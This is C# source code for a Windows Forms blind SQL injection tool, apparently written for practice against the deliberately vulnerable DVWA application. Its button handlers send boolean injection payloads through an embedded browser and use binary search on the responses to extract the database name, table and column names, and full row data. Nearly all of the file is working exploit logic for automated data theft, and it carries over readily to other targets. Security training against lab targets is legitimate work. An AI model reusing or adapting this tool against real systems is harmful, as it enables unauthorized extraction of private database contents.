private void button1_Click(object sender, EventArgs e)
{
btn_Click = true;
Confirm.Is_Click_btnGDatabaseName = true;
Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT DATABASE()), 0,1))) >= 127 #";
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name);
PutData(Variable.Sql_Request);
btn_GetDBName.Enabled = false;
}
public static ResultRequest.Job Get_Result_Respond(ResultRequest.Result result,
ref string sql, ref int left, ref int right, ref int mid, ref string str_result)
{
ResultRequest.Job work_state = ResultRequest.Job.None;
if (Confirm.Is_Click_btnGDatabaseName)
{
work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DB_Name,
ref sql, ref left, ref right, ref mid, ref str_result);
}
else if (Confirm.Is_Click_btnGNameTables)
{
if (Confirm.Count_Tables_Done)
{
work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.TABLES_NAME,
ref sql, ref left, ref right, ref mid, ref str_result);
}
else
{
work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.TABLES_NAME,
ref sql, ref left, ref right, ref mid, ref str_result);
}
}
else if (Confirm.Is_Click_btnGNameColumns)
{
if (Confirm.Find_Quantity_Done)
{
work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.COLUMNS_NAME,
ref sql, ref left, ref right, ref mid, ref str_result);
}
else
{
work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.COLUMNS_NAME,
ref sql, ref left, ref right, ref mid, ref str_result);
}
}
else if (Confirm.Is_Click_btnGetData)
{
if (!Confirm.Find_Quantity_Row_Done.Contains(false))
{
work_state = Handing.Respond(result, ResultRequest.Mode.String, ResultRequest.Mode_SQL.DATA_TABLE,
ref sql, ref left, ref right, ref mid, ref str_result);
}
else
{
work_state = Handing.Respond(result, ResultRequest.Mode.Number, ResultRequest.Mode_SQL.DATA_TABLE,
ref sql, ref left, ref right, ref mid, ref str_result);
}
}
return(work_state);
}
private void btn_GetData_Click(object sender, EventArgs e)
{
if (Variable.Db_TablesName.Count != 0) //find tables name done
{
if (Variable.Db_ColumnsName[0].Count != 0) //find columns name done
{
btn_Click = true;
Confirm.Is_Click_btnGetData = true;
if (Confirm.Find_Quantity_Row_Done.Count != 0 && !Confirm.Find_Quantity_Row_Done.Contains(false))
{
if (Variable.Bd_DataTable.Count == 0)
{
Init_DataTable();
Variable.Index_Columns = Variable.Index_Rows = Variable.Index_Tables = 0;
}
while (true)
{
if (Variable.Index_Tables >= Variable.Quantity_Tables)
{
List <List <List <string> > > a = Variable.Bd_DataTable;
Variable.Index_Tables = Variable.Index_Columns = Variable.Index_Rows = 0;
Variable.Reset_Data_Variable();
return;
}
else
{
if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
{
Variable.Index_Columns = 0;
Variable.Index_Rows++;
if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables])
{
Variable.Index_Rows = 0;
Variable.Index_Tables++;
}
}
else if (!clb_ColsName.GetItemChecked(clb_ColsName.Items.IndexOf(Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns])))
{
Variable.Index_Columns++;
}
else
{
break;
}
}
}
Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT " + Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] + " from dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + " LIMIT 0, 1), 0, 1))) >= 127 #";
if (Variable.Index_Tables < Variable.Quantity_Tables)
{
if (Variable.Index_Rows < Variable.Quantity_Row[Variable.Index_Tables])
{
if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables])
{
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE);
PutData(Variable.Sql_Request);
}
}
else
{
List <List <List <string> > > a = Variable.Bd_DataTable;
}
}
}
else //count quantity don't complete
{
if (Confirm.Find_Quantity_Row_Done.Count == 0)
{
for (int run = 0; run < Variable.Quantity_Tables; run++)
{
Confirm.Find_Quantity_Row_Done.Add(false);
Variable.Quantity_Row.Add(0);
}
Variable.Index_Tables = 0;
Variable.Str_result = "";
Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #";
PutData(Variable.Sql_Request);
}
else
{
for (int run = 0; run < Confirm.Find_Quantity_Row_Done.Count; run++)
{
if (Confirm.Find_Quantity_Row_Done[run] == false)
{
Variable.Index_Tables = run;
break;
}
}
//count row
Variable.Str_result = "";
Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM dvwa." + Variable.Db_TablesName[Variable.Index_Tables] + ") >= 127 #";
PutData(Variable.Sql_Request);
}
}
}
}
}
private void btn_GetColsName_Click(object sender, EventArgs e)
{
if (Variable.Quantity_Tables != 0)
{
btn_Click = true;
Confirm.Is_Click_btnGNameColumns = true;
if (Confirm.Find_Quantity_Done) //had quantity
{
if (Variable.Db_ColumnsName.Count == 0)
{
for (int row = 0; row < Variable.Quantity_Tables; row++)
{
List <string> temp = new List <string>();
for (int col = 0; col < Variable.Quantity_Columns[row]; col++)
{
temp.Add("");
}
Variable.Db_ColumnsName.Add(temp);
}
Variable.Index_Columns = Variable.Index_Tables = 0;
Variable.Index_str = 0;
}
//ascii(lower(substring((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA LIKE 'dvwa' LIMIT 0, 1), 0, 1))) >= 127 #";
if (Variable.Index_Tables < Variable.Quantity_Tables)
{
Variable.Sql_Request = "1' AND ascii(lower(substring((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "' LIMIT 0, 1), 0, 1))) >= 127 #";
if (Variable.Index_Columns < Variable.Quantity_Columns[Variable.Index_Tables])
{
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME);
PutData(Variable.Sql_Request);
}
}
else
{
cmb_Tables.Items.Add("ALL");
foreach (string str in Variable.Db_TablesName)
{
cmb_TbsName.Items.Add(str);
cmb_Tables.Items.Add(str);
}
cmb_TbsName.SelectedIndex = 0;
cmb_Tables.SelectedIndex = 0;
foreach (List <string> ls in Variable.Db_ColumnsName)
{
foreach (string str in ls)
{
clb_ColsName.Items.Add(str, true);
}
}
btn_GetTBsName.Enabled = false;
btn_Click = false;
Variable.Index_Columns = Variable.Index_Tables = 0;
Confirm.Is_Click_btnGNameColumns = false;
Variable.Reset_Data_Variable();
return;
}
}
else // count quantity
{
if (Variable.Quantity_Columns.Count == 0)
{
Variable.Index_Tables = 0;
for (int run = 0; run < Variable.Quantity_Tables; run++)
{
Variable.Quantity_Columns.Add(0);
}
}
if (Variable.Index_Tables < Variable.Quantity_Tables)
{
//sql = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE 'guestbook') >= 127 #";
Variable.Sql_Request = "1' AND (SELECT COUNT(*) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA LIKE 'dvwa' AND TABLE_NAME LIKE '" + Variable.Db_TablesName[Variable.Index_Tables] + "') >= 127 #";
PutData(Variable.Sql_Request);
}
else //find done
{
Confirm.Find_Quantity_Done = true;
Variable.Index_Tables = 0;
Variable.Index_Columns = 0;
btn_GetColsName.PerformClick();
return;
}
}
}
}
private void wbro_Brower_DocumentCompleted(object sender, WebBrowserDocumentCompletedEventArgs e)
{
txt_Url.Text = wbro_Brower.Url.ToString();
html = wbro_Brower.DocumentText;
html_Document_Current = wbro_Brower.Document;
if (btn_Click)
{
ResultRequest.Result result = Handing.GetResultSubmit(html_Document_Current);
ResultRequest.Job work_state = ResultRequest.Job.None;
int left, mid, right, index;
string str_result, sql;
left = mid = right = index = 0;
str_result = sql = "";
Variable.Get_Data_Variable(ref left, ref mid, ref right, ref index, ref str_result, ref sql);
work_state = Handing.Get_Result_Respond(result, ref sql, ref left, ref right, ref mid, ref str_result);
Variable.Set_Data_Variable(left, mid, right, index, str_result, sql);
if (work_state == ResultRequest.Job.Done_ALL)
{
if (Confirm.Is_Click_btnGDatabaseName)
{
Confirm.Is_Click_btnGDatabaseName = false;
btn_Click = false;
btn_GetDBName.Enabled = false;
Variable.Left = 0; Variable.Right = 255; Variable.Mid = 127; Variable.Index_str = 0;
Variable.Str_result = "";
return;
}
else if (Confirm.Is_Click_btnGNameTables)
{
if (Confirm.Count_Tables_Done) // print table name
{
Variable.Index_str = 0;
if (Variable.Index_Tables < Variable.Quantity_Tables)
{
Variable.Index_Tables++;
lbl_TBsName.Text += " ";
Variable.Left = 0; Variable.Right = 255; Variable.Mid = 127;
btn_GetTBsName.PerformClick();
return;
}
else // all done
{
Variable.Index_str = 0;
Confirm.Is_Click_btnGNameTables = false;
btn_Click = false;
cmb_TbsName.Items.Add(Variable.Db_TablesName);
return;
}
}
else
{
lbl_Count_TBsName.Text += Variable.Str_result;
Variable.Quantity_Tables = Convert.ToInt32(Variable.Str_result);
Confirm.Count_Tables_Done = true;
Variable.Reset_Data_Variable();
btn_GetTBsName.PerformClick();
return;
}
}
else if (Confirm.Is_Click_btnGNameColumns)
{
if (Confirm.Find_Quantity_Done)
{
Variable.Index_Columns++;
if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
{
Variable.Index_Columns = 0;
Variable.Index_Tables++;
}
Variable.Reset_Data_Variable();
btn_GetColsName.PerformClick();
return;
}
else
{
Variable.Quantity_Columns[Variable.Index_Tables] = Convert.ToInt32(Variable.Str_result);
Variable.Str_result = "";
Variable.Index_Tables++;
Variable.Reset_Data_Variable();
btn_GetColsName.PerformClick();
return;
}
}
else if (Confirm.Is_Click_btnGetData)
{
if (Confirm.Find_Quantity_Row_Done.Contains(false)) //don't complete
{
Variable.Quantity_Row[Variable.Index_Tables] = Convert.ToInt32(Variable.Str_result);
Confirm.Find_Quantity_Row_Done[Variable.Index_Tables] = true;
Variable.Reset_Data_Variable();
btn_GetData.PerformClick();
return;
}
else
{
Variable.Index_Columns++;
if (Variable.Index_Columns >= Variable.Quantity_Columns[Variable.Index_Tables])
{
Variable.Index_Columns = 0;
Variable.Index_Rows++;
if (Variable.Index_Rows >= Variable.Quantity_Row[Variable.Index_Tables])
{
Variable.Index_Rows = 0;
Variable.Index_Tables++;
}
}
else
{
Change_IndexCols_Whent_GetDataTable();
}
Variable.Reset_Data_Variable();
btn_GetData.PerformClick();
return;
}
}
}
else if (work_state == ResultRequest.Job.Done_OnePart)
{
if (Confirm.Is_Click_btnGDatabaseName)
{
lbl_Result_DBName.Text += Variable.Str_result;
Variable.Db_Name += Variable.Str_result;
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DB_Name);
}
else if (Confirm.Is_Click_btnGNameTables)
{
Variable.Db_TablesName[Variable.Index_Tables] += Variable.Str_result;
lbl_TBsName.Text += Variable.Str_result;
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.TABLES_NAME);
}
else if (Confirm.Is_Click_btnGNameColumns)
{
Variable.Db_ColumnsName[Variable.Index_Tables][Variable.Index_Columns] += Variable.Str_result;
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.COLUMNS_NAME);
}
else if (Confirm.Is_Click_btnGetData)
{
Variable.Bd_DataTable[Variable.Index_Tables][Variable.Index_Rows][Variable.Index_Columns] += Variable.Str_result;
Variable.Sql_Request = Handing.Change_Sql_Get_Next_Char(ResultRequest.Mode_SQL.DATA_TABLE);
dgv_Data.DataSource = Fill_Data_To_DataTable();
}
PutData(Variable.Sql_Request);
}
else if (work_state == ResultRequest.Job.Continue)
{
PutData(Variable.Sql_Request);
}
}
}
